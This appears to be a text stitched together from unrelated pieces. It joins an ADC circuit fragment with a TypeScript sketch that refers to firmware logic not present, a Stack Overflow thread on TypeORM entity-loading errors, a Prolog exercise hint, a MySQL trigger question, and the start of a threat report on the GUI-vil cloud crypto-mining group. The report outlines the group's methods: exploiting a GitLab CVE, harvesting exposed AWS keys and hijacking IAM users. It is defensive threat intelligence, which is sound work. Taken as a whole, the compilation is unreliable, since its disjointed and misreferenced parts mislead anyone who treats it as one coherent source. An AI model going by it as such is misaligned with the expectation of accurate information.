The circuit shown can digitize signals from +4.092 V to –4.092 V (8.184 V p-p) and can handle 10 V p-p if +VREF is set to +5 V (although converting the reading to the actual voltage becomes more complicated). The approach, then, doubles the ADC's normal span while maintaining the same resolution. Op amps with rail-to-rail inputs and outputs as well as low input-offset voltages will work best in this design. If speed is an issue, you can use faster op amps and a microcontroller with faster ADCs, playing the usual speed, accuracy, and power-consumption tradeoffs.
I included this jumper in the design because it is easy and provides extra features at zero cost. I have tried this configuration and it works, but there is crossover distortion which actually sounds like a subtle overdrive. In the future I will investigate more possibilities of this arrangement.
keep it simple
Last Edit: 6 years 6 months ago by JR.
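To make the channel-selection logic above concrete, here is a minimal sketch of the reading sequence written in TypeScript. It is purely illustrative: the readAdc stub and its simulated readings are assumptions standing in for the PIC16F876's real ADC registers and acquisition delay, and actual firmware would of course be written in C or assembly.

// Hypothetical stand-in for the PIC's ADC: on real hardware this would select the
// channel, wait ~40 µs for acquisition, start a conversion, and return a 10-bit result.
function readAdc(channel: number): number {
  const simulated = [500, 0]; // pretend AN0 reads 500 steps and AN1 reads 0
  return simulated[channel] ?? 0;
}

const MILLIVOLTS_PER_STEP = 4; // VREF = 4.096 V over 1024 steps => 4 mV per step

// Reconstruct a signed input voltage from the two unipolar channels:
// AN0 carries the positive half of VIN, AN1 carries the inverted negative half.
function readBipolarMillivolts(): number {
  const positive = readAdc(0);
  if (positive > 0) {
    return positive * MILLIVOLTS_PER_STEP;   // VIN > 0
  }
  const negative = readAdc(1);
  if (negative > 0) {
    return -negative * MILLIVOLTS_PER_STEP;  // VIN < 0
  }
  return 0;                                  // both channels at zero => VIN = 0 V
}

console.log(readBipolarMillivolts()); // 2000, i.e. +2.000 V with the simulated readings

The branch order mirrors the firmware description: only if the positive channel reads zero is the negative channel consulted, and a value from it is negated before being stored.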
139 Started new project with 'nest new' command. Works fine until I add entity file to it. Got following error: import { Entity, Column, PrimaryGeneratedColumn } from 'typeorm'; ^^^^^^ SyntaxError: Cannot use import statement outside a module What do I miss? Adding Entity to Module: import { Module } from '@nestjs/common'; import { BooksController } from './books.controller'; import { BooksService } from './books.service'; import { BookEntity } from './book.entity'; import { TypeOrmModule } from '@nestjs/typeorm'; @Module({ imports: [TypeOrmModule.forFeature([BookEntity])], controllers: [BooksController], providers: [BooksService], }) export class BooksModule {} app.module.ts: import { Module } from '@nestjs/common'; import { AppController } from './app.controller'; import { AppService } from './app.service'; import { TypeOrmModule } from '@nestjs/typeorm'; import { Connection } from 'typeorm'; import { BooksModule } from './books/books.module'; @Module({ imports: [TypeOrmModule.forRoot()], controllers: [AppController], providers: [AppService], }) export class AppModule {} 4 • import { Module } from '@nestjs/common'; – Preston Dec 21, 2019 at 15:37 • @Preston care to elaborate on what you mean? Do you have to create a module for commonly shared files? Dec 21, 2019 at 22:35 • Are you getting the error from your linter or from a compilation? Where do you have this new file? Is it in your src directory? If you're using TypeORM, can you show your TypeOrmModule import in the AppModule's imports array? There may be something wrong with the configuration we can't see Dec 23, 2019 at 16:25 • updated post with entity import info – Anton Dec 24, 2019 at 12:28 29 Answers 29 221 My assumption is that you have a TypeormModule configuration with an entities property that looks like this: entities: ['src/**/*.entity.{ts,js}'] or like entities: ['../**/*.entity.{ts,js}'] The error you are getting is because you are attempting to import a ts file in a js context. So long as you aren't using webpack you can use this instead so that you get the correct files entities: [join(__dirname, '**', '*.entity.{ts,js}')] where join is imported from the path module. Now __dirname will resolve to src or dist and then find the expected ts or js file respectively. let me know if there is still an issue going on. EDIT 1/10/2020 The above assumes the configuration is done is a javascript compatible file (.js or in the TypeormModule.forRoot() passed parameters). If you are using an ormconfig.json instead, you should use entities: ["dist/**/*.entity.js"] so that you are using the compiled js files and have no chance to use the ts files in your code. Or use autoLoadEntities: true, 6 • 109 But this is a total mess. A typescript ORM that does not accept typescript for the migrations... – Matteo Feb 3, 2020 at 6:00 • 3 deno is the only native typescript code runner. TypeORM, while it uses Typescript, still works with Node and the JavaScript runtime. Maybe improvements can be made to accept ts files and compile them into JavaScript under the hood, then delete them so the end user doesn't see them, but that would need to be brought up as an issue on the TypeORM git repository Feb 3, 2020 at 6:40 • 2 actually full line must be "entities": ["dist/**/*.entity.js"], because of json syntax. May 9, 2020 at 17:12 • 21 I absolutely agree that having to reach into the transpiled JS for all this mess to work is a joke. 
– Patrick Aug 22, 2020 at 12:34 • 3 The Issue #4283 on Github explains in details why JavaScript should be used to read entities from Dist folder. This is the magic line I changed in ormconfig.js in the root folder, you too can try and see. entities: ['dist/**/*.entity.js'] is the solution. – Agent May 20, 2021 at 11:49 62 In the TypeORM documentation, i found a specific section for Typescript. This section says: Install ts-node globally: npm install -g ts-node Add typeorm command under scripts section in package.json "scripts" { ... "typeorm": "ts-node -r tsconfig-paths/register ./node_modules/typeorm/cli.js" } Then you may run the command like this: npm run typeorm migration:run If you need to pass parameter with dash to npm script, you will need to add them after --. For example, if you need to generate, the command is like this: npm run typeorm migration:generate -- -n migrationNameHere This works with my file config: { "type": "postgres", "host": "yourhost", "port": 5423, "username": "username", "password": "password", "database": "your_db", "synchronize": true, "entities": [ "src/modules/**/*.entity.{ts,js}" ], "migrations": [ "src/migrations/**/*.{ts,js}" ], "cli": { "entitiesDir": "src/modules", "migrationsDir": "src/migrations" } } Then you can run the generate command. 3 • 22.04.23 I had to run this: npm run typeorm migration:generate -- migrationNameHere -d ./src/data-source.ts Apr 22, 2023 at 15:46 • That's really awful. Who has a javascript exclusive tool? – Alper Dec 15, 2023 at 15:54 • I get RangeError: Maximum call stack size exceeded this way. Cant figure out to make it work. – Bulat Feb 20 at 11:22 25 As Jay McDoniel explained in his answer, the problem seems to be the pattern matching of entity files in ormconfig.json file: Probably a typescript file (module) is imported from a javascript file (presumably a previously transpiled typescript file). It should be sufficient to remove an existing ts glob pattern in the ormconfig.json, so that TypeORM will only load javascript files. The path to the entity files should be relative to the working directory where node is executed. "entities" : [ "dist/entity/**/*.js" ], "migrations" : [ "dist/migration/**/*.js" ], "subscribers": [ "dist/subscriber/**/*.js" ], 2 • The src should probably be changed to dist as that's where the runnable code is after being transpiled to javascript. Jan 10, 2020 at 18:48 • It took me a while: During runtime, code will be run off the 'dist' (Distribution) folder. And the *.entity.ts file containing the database model, will be translated to .js file by TypeOrm. Hence - entities entry should point to *.entity.js under the 'dist' folder. Thank you all. Save my day. – Yazid May 14, 2020 at 12:53 10 Defining the entities property in ormconfig.json as mentioned in the official documentation resolved this issue for me. // This is your ormconfig.json file ... "entities": ["dist/**/*.entity{.ts,.js}"] ... 8 I changed in tsconfig.json file next: "module": "es6" To: "module": "commonjs", It helps me 0 7 Also check out your imports in the entities. Don't import { SomeClassFromTypeorm } from 'typeorm/browser'; since this can lead to the same error. It happened to me after my IDE automatically imported the wrong package. Delete '/browser' from the import. 1 • 1 It it helps anyone else, this exact same thing happened to me, on a nestjs & typeorm project. 
import { Unique } from 'typeorm/browser'; just needed to be changed to import { Unique } from 'typeorm'; – Jay Feb 16, 2022 at 0:20 6 This is how I've manage to fix it. With a single configuration file I can run the migrations on application boostrap or using TypeOrm's CLI. src/config/ormconfig.ts import parseBoolean from '@eturino/ts-parse-boolean'; import { TypeOrmModuleOptions } from '@nestjs/typeorm'; import * as dotenv from 'dotenv'; import { join } from 'path'; dotenv.config(); export = [ { //name: 'default', type: 'mssql', host: process.env.DEFAULT_DB_HOST, username: process.env.DEFAULT_DB_USERNAME, password: process.env.DEFAULT_DB_PASSWORD, database: process.env.DEFAULT_DB_NAME, options: { instanceName: process.env.DEFAULT_DB_INSTANCE, enableArithAbort: false, }, logging: parseBoolean(process.env.DEFAULT_DB_LOGGING), dropSchema: false, synchronize: false, migrationsRun: parseBoolean(process.env.DEFAULT_DB_RUN_MIGRATIONS), migrations: [join(__dirname, '..', 'model/migration/*.{ts,js}')], cli: { migrationsDir: 'src/model/migration', }, entities: [ join(__dirname, '..', 'model/entity/default/**/*.entity.{ts,js}'), ], } as TypeOrmModuleOptions, { name: 'other', type: 'mssql', host: process.env.OTHER_DB_HOST, username: process.env.OTHER_DB_USERNAME, password: process.env.OTHER_DB_PASSWORD, database: process.env.OTHER_DB_NAME, options: { instanceName: process.env.OTHER_DB_INSTANCE, enableArithAbort: false, }, logging: parseBoolean(process.env.OTHER_DB_LOGGING), dropSchema: false, synchronize: false, migrationsRun: false, entities: [], } as TypeOrmModuleOptions, ]; src/app.module.ts import configuration from '@config/configuration'; import validationSchema from '@config/validation'; import { Module } from '@nestjs/common'; import { ConfigModule } from '@nestjs/config'; import { TypeOrmModule } from '@nestjs/typeorm'; import { LoggerService } from '@shared/logger/logger.service'; import { UsersModule } from '@user/user.module'; import { AppController } from './app.controller'; import ormconfig = require('./config/ormconfig'); //path mapping doesn't work here @Module({ imports: [ ConfigModule.forRoot({ cache: true, isGlobal: true, validationSchema: validationSchema, load: [configuration], }), TypeOrmModule.forRoot(ormconfig[0]), //default TypeOrmModule.forRoot(ormconfig[1]), //other db LoggerService, UsersModule, ], controllers: [AppController], }) export class AppModule {} package.json "scripts": { ... "typeorm": "ts-node -r tsconfig-paths/register ./node_modules/typeorm/cli.js --config ./src/config/ormconfig.ts", "typeorm:migration:generate": "npm run typeorm -- migration:generate -n", "typeorm:migration:run": "npm run typeorm -- migration:run" }, Project structure src/ ├── app.controller.ts ├── app.module.ts ├── config │ ├── configuration.ts │ ├── ormconfig.ts │ └── validation.ts ├── main.ts ├── model │ ├── entity │ ├── migration │ └── repository ├── route │ └── user └── shared └── logger 1 • I had to update migrations to match your syntax – Lahori May 28, 2021 at 11:02 4 I was using Node.js with Typescript and TypeORM when I faced this issue. Configuring in ormconfig.json file worked for me. 
entities: ['dist/**/*.entity.js'] My full code of ormconfig.json file: { "type": "mysql", "host": "localhost", "port": 3306, "username": "xxxxxxxx", "password": "xxxxxxxx", "database": "typescript_orm", "synchronize": true, "logging": false, "migrationTableName": "migrations", "entities": [ "dist/**/*.entity.js" ], "migrations": [ "src/migration/**/*.{ts, js}" ], "suscribers": [ "src/suscriber/**/*.{ts, js}" ], "cli": { "entitiesDir": "src/model", "migrationDir": "src/migration", "suscribersDir": "src/suscriber" } } 3 In line with other people's comments - it does in fact seem silly to have to depend on generated code for this to work. I do not take credit for this solution as it's someone else's repository, but it does in fact allow full Typescript only migrations. It relies on the .env file Typeorm values instead of ormconfig.json although I'm sure it could be translated. I found it instrumental in helping me remove the dependency on .js files. Here is the repo: https://github.com/mthomps4/next-now-test/tree/next-typeorm-example Explanation as to how it's working: Aside from your usual .env or ormconfig.json file with the proper localhost db connection in it, you also need to specify the following properly in ormconfig.json or .env file TYPEORM_ENTITIES="entities/*.ts" TYPEORM_MIGRATIONS="migrations/*.ts" TYPEORM_ENTITIES_DIR="entities" TYPEORM_MIGRATIONS_DIR="migrations" Notice the entities and migrations globs only have *.ts. The other very important piece is how your npm scripts are setup to run with ts-node. You need an extended tsconfig that has the following in it somewhere: { "extends": "./tsconfig.json", "compilerOptions": { "module": "commonjs" } } This is what allows ts-node to "pick up" the .ts files properly while generating a migration. This npm script (the DOTENV part is only if using .env files instead of ormconfig.json) specifies to use that tsconfig.json "local": "DOTENV_CONFIG_PATH=./.env ts-node -P ./tsconfig.yarn.json -r dotenv/config" Which is leveraged as a "pre-cursor" script to this: "typeorm:local": "yarn local ./node_modules/typeorm/cli.js" I'm not 100% sure all of that is necessary (you may could do it all inline) but it works for me. Basically this says "invoke the typrorm cli in the context of ts-node with a specific .env file and a specific tsconfig." You may be able to skip those configurations in some cases. Lastly, this script now works: "g:migration": "yarn typeorm:local migration:generate -n" So by running: npm run g:migration -- User You will get your automatically generated migration file based on your current changed entities! So 3 nested npm scripts later, we have a very specific way to run the "generate" migration conmmand with all the proper configuration to use only TS files. Yay - no wonder some people still rail against typescript but thankfully this does work and the example repo above has it all preconfigured if you want to try it out to see how it "just works". 1 • 1 Thanks for this; useful! 
Feb 5, 2021 at 16:21 3 check your TypeOrmModule's entities TypeOrmModule.forRoot({ type: 'postgres', host: 'localhost', port: 5432, username: 'postgres', password: '#GoHomeGota', database: 'quiz', **entities: ["dist/**/*.entity{.ts,.js}"],** synchronize: true, }), 3 The alternative I found for this is having two orm config files namely orm-config.ts and cli-orm-config.ts (You can name them whatever) //content of cli-orm-config.ts import { DataSource, DataSourceOptions } from "typeorm" import 'dotenv/config' export const cliOrmConfig: DataSourceOptions = { type: 'postgres', host: process.env.DATABASE_HOST, port: (process.env.PG_DATABASE_PORT as any) as number, username: process.env.PG_DATABASE_USER, password: process.env.PG_DATABASE_PASSWORD, database: process.env.DATABASE_NAME, entities: ["src/**/*/*.entity{.ts,.js}"], migrations: ["src/**/*/*-Migration{.ts,.js}"] } const datasource = new DataSource(cliOrmConfig) export default datasource //content of orm-config.ts, this is the one I use in nest TypeOrmModule.forRoot(ormConfig) import { DataSource, DataSourceOptions } from 'typeorm'; import 'dotenv/config' export const ormConfig: DataSourceOptions = { type: 'postgres', host: process.env.DATABASE_HOST, port: (process.env.PG_DATABASE_PORT as any) as number, username: process.env.PG_DATABASE_USER, password: process.env.PG_DATABASE_PASSWORD, database: process.env.DATABASE_NAME, entities: ["dist/src/**/*/*.entity{.ts,.js}"] } const datasource = new DataSource(ormConfig) export default datasource // My package.json relevant scripts section "typeorm": "ts-node ./node_modules/typeorm/cli -d ./src/db/cli-orm-config.ts", "nest:migration:generate": "npm run typeorm migration:generate ./src/db/migrations/Migration", "nest:migration:run": "npm run typeorm migration:run" I think as far as TypeOrm is concerned, the migration, cli parts should be teared apart from models loading and other stuffs; hence the seperation of the orm configs file for both. Hope it helps somebody 3 Surprised by these almost kinda hacky solutions, particularly of the accepted one... You should never import anything from a dist folder inside your ts source code! If the answered assumption is true, and you do this: entities: ['src/**/*.entity.{ts,js}'] then, why don't you rather DO THIS: import { Answer } from './entities/answer/answer.entity'; entities: [Answer] This way you would you use your ts code (correctly) and the builded js code would get provided to the TypeOrmModule in runtime. 0 2 Actually, typeorm was designed to work with javascript by default. To run the migrations with typescript, you must tell typeorm to do it. Just put in your package.json, in the scripts part this line below: "typeorm": "ts-node-dev ./node_modules/typeorm/cli.js" and then, try to migrate again: yarn typeorm migration:run 1 • doesnt work. "Missing required argument: dataSource" Jun 26, 2022 at 13:10 2 I think a better solution, than the accepted one, is to create a alias in your shell of choice, that uses ts-node inside node_modules. Note: I'm doing this in bash, with OhMyZsh, so your configuration might be totally different. 1: Open shell configuration Open shell configuration1 nano ~/.zshrc 2: Find the place where other aliases are defined and add a new alias alias typeorm="ts-node ./node_modules/typeorm/cli.js" 3: Close and save Press CTRL + X to request nano to exit and press Y to confirm to save the configuration. 4: Apply the new configuration . 
~/.zshrc 5: Close terminal and open it again You can now go to your project root and type "typeorm" which will use ts-node in conjunction with the typeorm-cli from your node_modules. 2 I ran into this error trying to run typeorm migration:generate from a project created with the TypeORM starter kit (npx typeorm init). The issue came down to this bit that it inserted into package.json: "scripts": { "typeorm": "typeorm-ts-node-commonjs" } Change that to: "scripts": { "typeorm": "typeorm-ts-node-esm" } And you should be good to go: npm run -- typeorm migration:generate --dataSource path/to/data-source.ts NameOfMigration 1 • Thank you! Struggled a lot with this – treecon Jan 27, 2023 at 19:18 2 I Upgraded NestJs to 9.2.0 and typeorm to 0.3.10 And i got a probleme when runing a new migration But i Found out the solution and that works for me: in the previous Version (nest 7 typeorm 0.2) i used this command : npx ts-node ./node_modules/.bin/typeorm migration:generate -n MigrationName -d src/migrations and after updating i used this command and it workd for me: npx ts-node ./node_modules/.bin/typeorm migration:generate src/migration/MigrationName -d ormconfig.js when generate migration we need to set the path of the new migrationFile migration:generate -d means directory of migration => -d src/migration in typeorm 0.2 -d means dataSource (config) => -d ormconfig in typeorm 0.3 1 You need to have a something.module.ts for every section of your app. It works like Angular. This is setup with GraphQL resolvers and service. REST is a bit different with a controller. Each module will probably have an entity and if GraphQL, projects.schema.graphql. projects.module.ts import { Module } from '@nestjs/common'; import { TypeOrmModule } from '@nestjs/typeorm'; import { ProjectsService } from './projects.service'; import { Projects } from './projects.entity'; import { ProjectsResolvers } from './projects.resolvers'; @Module({ imports: [ TypeOrmModule.forFeature([Projects])], providers: [ ProjectsService, ProjectsResolvers ], }) export class ProjectsModule {} 4 • Excellent. So does that mean you can ever have a base entity shared across multiple modules or would that base entity have to be part of a commons module of sorts? Dec 22, 2019 at 2:49 • I think i've already imported entity to module. Please take a look at updated post – Anton Dec 24, 2019 at 12:29 • Sorry Anton, I'm traveling on vacation now and can't help you until January. I would have to look at my old REST modules and I don't have them with me. – Preston Dec 24, 2019 at 16:07 • 1 Anton, if you have already solved this then please post your solution to SO. – Preston Jan 3, 2020 at 16:57 1 This worked for me - no changes needed to your ormconfig.js. 
Run from your root directory where the node_modules are: ts-node ./node_modules/typeorm/cli.js migration:generate -n <MirgrationName> -c <ConnectionType> Example: ts-node ./node_modules/typeorm/cli.js migration:create -n AuthorHasMultipleBooks -c development 1 • not working "Not enough non-option arguments: got 0, need at least 1" Jun 26, 2022 at 13:11 1 Configuration to support migrations: // FILE: src/config/ormconfig.ts const connectionOptions: ConnectionOptions = { // Other configs here // My ormconfig isn't in root folder entities: [`${__dirname}/../**/*.entity.{ts,js}`], synchronize: false, dropSchema: false, migrationsRun: false, migrations: [getMigrationDirectory()], cli: { migrationsDir: 'src/migrations', } } function getMigrationDirectory() { const directory = process.env.NODE_ENV === 'migration' ? 'src' : `${__dirname}`; return `${directory}/migrations/**/*{.ts,.js}`; } export = connectionOptions; // FILE package.json { // Other configs here "scripts": { "typeorm": "NODE_ENV=migration ts-node -r tsconfig-paths/register ./node_modules/typeorm/cli.js --config src/config/database.ts", "typeorm:migrate": "npm run typeorm migration:generate -- -n", "typeorm:run": "npm run typeorm migration:run", "typeorm:revert": "npm run typeorm migration:revert" } } 1 I have encountered the same problem. The only difference is that my project uses .env file instead of ormconfig.json This is what my .env file configuration looks like. TYPEORM_ENTITIES = src/modules/*.entity.ts TYPEORM_MIGRATIONS = src/migrations/*.entity.ts TYPEORM_MIGRATIONS_RUN = src/migrations TYPEORM_ENTITIES_DIR = src/modules TYPEORM_MIGRATIONS_DIR = src/migrations And run by using command nest start The problem appears to be that TypeORM does not accept entities in the form of typescript files. There are two approaches that can be used to solve this problem. 1. Use node-ts instead of nest start solved the problem without modifying the path of the entities file. From my understanding, node-ts will process the typescript file in the src folder without issue. 2. Change the entity and migration file paths to point to the compiled js file in the dist folder instead. TYPEORM_ENTITIES = dist/modules/*.entity.js TYPEORM_MIGRATIONS = dist/migrations/*.entity.js TYPEORM_MIGRATIONS_RUN = dist/migrations TYPEORM_ENTITIES_DIR = dist/modules TYPEORM_MIGRATIONS_DIR = dist/migrations with this approach, I can use nest start without any problem. 1 I used this solution only for production. for development I change "../src/entity/**/*.ts" to "src/entity/**/*.ts" and then run this command: "nodemon --exec ts-node ./src/index.ts" and it works – 1 I solved the problem! 1. Create pm2.config.js file in root with below codes: module.exports = { apps: [ { name: "app", script: "./build/index.js", }, ], }; 2. Change entity path in ormconfig.js { "type": "postgres", "host": "localhost", "port": 5432, "username": "postgres", "password": "password", "database": "db_name", "synchronize": false, "logging": true, "entities": [ "../src/entity/**/*.ts", ===>>> this line is important "./build/entity/**/*.js" ], "migrations": [ "../src/migration/**/*.ts",===>>> this line is important "./build/migration/**/*.js" ], "subscribers": [ "../src/subscriber/**/*.ts",===>>> this line is important "./build/subscriber/**/*.js" ], "cli": { "entitiesDir": "src/entity", "migrationsDir": "src/migration", "subscribersDir": "src/subscriber" } } 3. 
tsconfig.json with below code: { "compilerOptions": { "lib": [ "es5", "es6" ], "target": "es5", "module": "commonjs", "moduleResolution": "node", "outDir": "./build", "emitDecoratorMetadata": true, "experimentalDecorators": true, "sourceMap": true, "esModuleInterop": true } } 4. Run below command for production: tsc =>> This command generate "build" folder 5. Run below command for run node app in pm2: tsc && pm2 start pm2.config.js Now after 2 days with this solution my app with node express & typeorm is worked! Also my app are working on linux & nginx with pm2. 1 • I used this solution only for production. for development I change "../src/entity/**/*.ts" to "src/entity/**/*.ts" and then run "nodemon --exec ts-node ./src/index.ts" and it works Sep 6, 2021 at 17:56 1 The accepted answer here (https://stackoverflow.com/a/59607836/2040160) was help me generate and run the migrations, but not to run the NestJS project. I got the same error as the author when I npm run start:dev. What worked for me, is to just generate the migrations file in vanilla JavaScript. My ormconfig,json file: { "type": "cockroachdb", "host": "localhost", "port": 26257, "username": "root", "password": "", "database": "test", "entities": ["dist/**/*.entity{.ts,.js}"], "migrations": ["migration/*.js"], "synchronize": false, "cli": { "migrationsDir": "migration" } } The script in package.json: "typeorm": "node --require ts-node/register ./node_modules/typeorm/cli.js" And the command I use to generate the migrations: npm run typeorm migration:generate -- -o -n init The -o flag will output the migrations in vanilla JavaScript. 2 • That is not a solution. You just created a workaround and pretend that the problem is fixed. – Michal Jan 16, 2022 at 22:17 • I don't pretend that the problem is fixed, I just wanted to help and add the workaround that worked for me. Maybe it'll shad more light on the issue and help someone figure out a solution. – Nirgn Apr 11, 2022 at 11:51 0 If you are writing in typescript and use tsc to create a dist folder with translated js files in it, then you probably have my issue and it will get fixed here. As it is mentioned here in the docs if you use nodemon server.js, then you will hit the entities from js perspective and it will not recognize import as it is ts and es6 related. However if you want to import entities from ts files, you should run ts-node server.ts! Personally I believe the former node server.js is a safer one to do as it is closer to the real case application. !!! HOWEVER !!! Be very careful as you have to delete the dist folder and rebuild it if you change an entity's name, otherwise it will throw an error or work unexpectedly. The error happens because the tsc will try to translate the changed and created ts files and leave the deleted files so it can run faster! I hope it helped as it will definitely help me in the future as I am almost certain I will forget about it again! 0 The error is on your ormconfig.json file. check where is your code searching for the entities, migrations, subscribers. In a dev, test environment it will search for them in your src/entities src/migrations src/subscribers. But in a production environment, if you leave it as it is, it will still search in the same path instead of your build path dist/src/entities etc.... ;) 0 I spent so much time in this mini compilation hell :) Just use the autoLoadEntities option in https://docs.nestjs.com/techniques/database v useful!! 
0 0 For me, changing module in my tsconfig.json from "module": "esnext" To: "module": "commonjs", Did the job. 0 In my scenario, the import statement problem persisted despite attempting various troubleshooting steps. Initially, my Node.js environment was set to version 20. However, after exhausting multiple solutions without success, I switched to Node.js version 18 and this issue was resolved. -2 npm run typeorm migration:generate -- -n translationLength 1 • 1 Your answer could be improved with additional supporting information. Please edit to add further details, such as citations or documentation, so that others can confirm that your answer is correct. You can find more information on how to write good answers in the help center. – Community Bot Mar 30, 2022 at 10:02
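Pulling together the recurring advice in these answers, a minimal sketch of a NestJS module configuration that sidesteps the ts/js entity mismatch might look like the following. The connection details are placeholders, autoLoadEntities is the option several answers point to instead of glob paths, and the commented glob is the accepted answer's join(__dirname, ...) alternative; treat it as a starting point rather than the canonical fix.

import { Module } from '@nestjs/common';
import { TypeOrmModule } from '@nestjs/typeorm';

@Module({
  imports: [
    TypeOrmModule.forRoot({
      type: 'postgres',
      host: 'localhost',      // placeholder connection details
      port: 5432,
      username: 'postgres',
      password: 'secret',
      database: 'example',
      // Register entities from each feature module's TypeOrmModule.forFeature() call,
      // so no ts/js glob path is needed at all.
      autoLoadEntities: true,
      // Alternative from the accepted answer: a glob that resolves correctly both before
      // and after compilation, e.g. join(__dirname, '**', '*.entity.{ts,js}').
      synchronize: false,
    }),
  ],
})
export class AppModule {}

Either way, the point is the same: at runtime the process must load compiled .js entities (or classes registered directly), never raw .ts files.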
Hint
This task is very similar to the task solved by the predicate element_of/2, which we saw in the lecture. There are two cases which can be distinguished:
1. The first element of the input list is a 0. In this case the list obviously contains 0 and element_of should succeed.
2. The first element is not 0. In this case, the tail of the list should contain a 0. That is, element_of should be true of the tail.
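If it helps to see the shape of the recursion outside Prolog, here is a rough TypeScript analogue of the two cases described above. It is purely illustrative (the exercise itself still expects a Prolog predicate in the style of element_of/2), and the function name containsZero is invented for this sketch.

// Illustrative only: the same two-case recursion the hint describes,
// expressed over an array instead of a Prolog list.
function containsZero(list: number[]): boolean {
  if (list.length === 0) {
    return false;              // empty list: no 0 can be found, so fail
  }
  const [head, ...tail] = list;
  if (head === 0) {
    return true;               // case 1: the first element is 0, so succeed
  }
  return containsZero(tail);   // case 2: otherwise the tail must contain a 0
}

console.log(containsZero([3, 0, 7])); // true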
MySQL.RU - Webboard
triggers (Michael) 06/11/2007 - 19:08:50
      Re: triggers (EuGen) 08/11/2007 - 12:43:17
From: Michael - 06/11/2007 - 19:08:50
Subject: triggers
-----------------
In short, I want to implement the following functionality. There is a table (SQL code):
CREATE TABLE `ceway_tree` ( `id` int(11) NOT NULL auto_increment, `pid` int(11) NOT NULL default '0', `ord` int(11) NOT NULL default '0', `lang` varchar(3) collate utf8_bin NOT NULL default 'rus', `alias` varchar(255) collate utf8_bin NOT NULL, `name` varchar(255) collate utf8_bin NOT NULL, `component` varchar(255) collate utf8_bin NOT NULL, `modules` text collate utf8_bin NOT NULL, `template` varchar(255) collate utf8_bin NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin AUTO_INCREMENT=6 ;
I need to attach two triggers to it (update, delete) that, before a record is modified or deleted, would copy it into another table of the same structure (ceway_tree_backup)... Is there any way to implement this?
4/24 KPMG + Permiso LUCR-3 (Scattered Spider) Threat Briefing REGISTER NOW Illustration Cloud Unmasking GUI-Vil: Financially Motivated Cloud Threat Actor Summary (the TL;DR) Guivil ALC Permiso’s p0 Labs has been tracking a threat actor for the last 18 months. In this article we will describe the attack lifecycle and detection opportunities for the cloud-focused, financially motivated threat actor we have dubbed as p0-LUCR-1, aka GUI-vil (Goo-ee-vil). GUI-vil is a financially motivated threat group sourcing from Indonesia whose primary objective is performing unauthorized cryptocurrency mining activities. Leveraging compromised credentials, the group has been observed exploiting Amazon Web Services (AWS) EC2 instances to facilitate their illicit crypto mining operations. Permiso first observed this threat actor in November of 2021, and most recently observed their activity in April of 2023. The group displays a preference for Graphical User Interface (GUI) tools, specifically an older version of S3 Browser (version 9.5.5, released January of 2021) for their initial operations. Upon gaining AWS Management Console access, they conduct their operations directly through the web browser. The source IP addresses associated with the attacker's activities are linked to two (2) specific Indonesian Autonomous System Numbers (ASNs) - PT. Telekomunikasi Selula and PT Telekomunikasi Indonesia. In their typical attack lifecycle, GUI-vil initially performs reconnaissance by monitoring public sources for exposed AWS keys (GitHub, Pastebin) and scanning for vulnerable GitLab instances. Initial compromises are predominantly achieved via exploiting known vulnerabilities such as CVE-2021-22205, or via using publicly exposed credentials. GUI-vil, unlike many groups focused on crypto mining, apply a personal touch when establishing a foothold in an environment. They attempt to masquerade as legitimate users by creating usernames that match the victim’s naming standard, or in some cases taking over existing users by creating login profiles for a user where none existed (takeover activity appearing as iam:GetLoginProfile failure followed by successful iam:CreateLoginProfile). The group's primary mission, financially driven, is to create EC2 instances to facilitate their crypto mining activities. In many cases the profits they make from crypto mining are just a sliver of the expense the victim organizations have to pay for running the EC2 instances. Attacker Attributes Highlights: • Unlike many commodity threat actors in the cloud that rely on automation, GUI-vil are engaged attackers at the keyboard, ready to adapt to whatever situation they are in. • They are allergic to CLI utilities, using S3 Browser and AWS Management Console via web browsers as their tooling. • They apply a personal touch. They model the name of their IAM Users, and sometimes their policies, keypairs, etc., on what they find present in the environment. Often time this helps them blend in. • They fight hard to maintain access in an environment when defenders find them. They don’t just tuck their tail and leave. • They often make mistakes by leaving S3 Browser defaults. 
• <YOUR-BUCKET-NAME>” being a favorite, but also default policy and IAM user names Your Bucket { "userName": "FileBackupAccount", "policyName": "dq", "policyDocument": "{\\r\\n \\"Statement\\": [\\r\\n {\\r\\n \\"Effect\\": \\"Allow\\",\\r\\n \\"Action\\": \\"s3:GetObject\\",\\r\\n \\"Resource\\": \\"arn:aws:s3:::<YOUR-BUCKET-NAME>/*\\",\\r\\n \\"Condition\\": {}\\r\\n }\\r\\n ]\\r\\n}" } Example request parameters from iam:PutUserPolicy event in CloudTrail logs Mission GUI-vil is a financially motivated threat actor, that leverages compromised credentials to spin up EC2 instances for use in crypto mining. Tooling GUI-vil leverages mostly GUI tools in their attacks. Initial access, reconnaissance, and persistence are all completed using the GUI utility S3 Browser. We have observed the threat actors continued use of the same version of S3 Browser (version 9.5.5, released January of 2021) to carry out their attacks since November 13, 2021. Once GUI-vil is able to create or take ownership of an IAM user with AWS Management Console access, they perform the rest of their activities directly through the web browser and AWS Management Console. Hours of operations (UTC/GMT) Guivil Hours Infrastructure All source addresses the attacker has originated from belong to two ASNs in Indonesia • PT. Telekomunikasi Selula • PT Telekomunikasi Indonesia Victimology GUI-vil is an equal opportunity attacker. Rather than targeting specific organizations, they are opportunistic and will attempt to attack any organization for which they can discover compromised credentials. Attacker Lifecycle info-image Initial Recon In order to support their mechanisms for initial access, GUI-vil performs two (2) main forms of reconnaissance: • Monitoring common public sources for exposed AWS access keys such as GitHub and Pastebin. • Scanning for vulnerable versions of software repositories such as GitLab. Initial Compromise & Establishing Foothold We have observed this threat actor leverage two (2) methods of initial compromise: • Leverage CVE-2021-22205 to gain Remote Code Execution (RCE) on vulnerable GitLab instances. Once GitLab is exploited the threat actor reviews repositories for AWS access keys. • In most instances this threat actor is able to find publicly exposed credentials and directly leverage them. The discovered access keys become their foothold into the AWS environment. They validate the access key and secret are active credentials by entering them into the Windows GUI utility S3 Browser, which will first execute the ListBuckets command against the S3 service. 
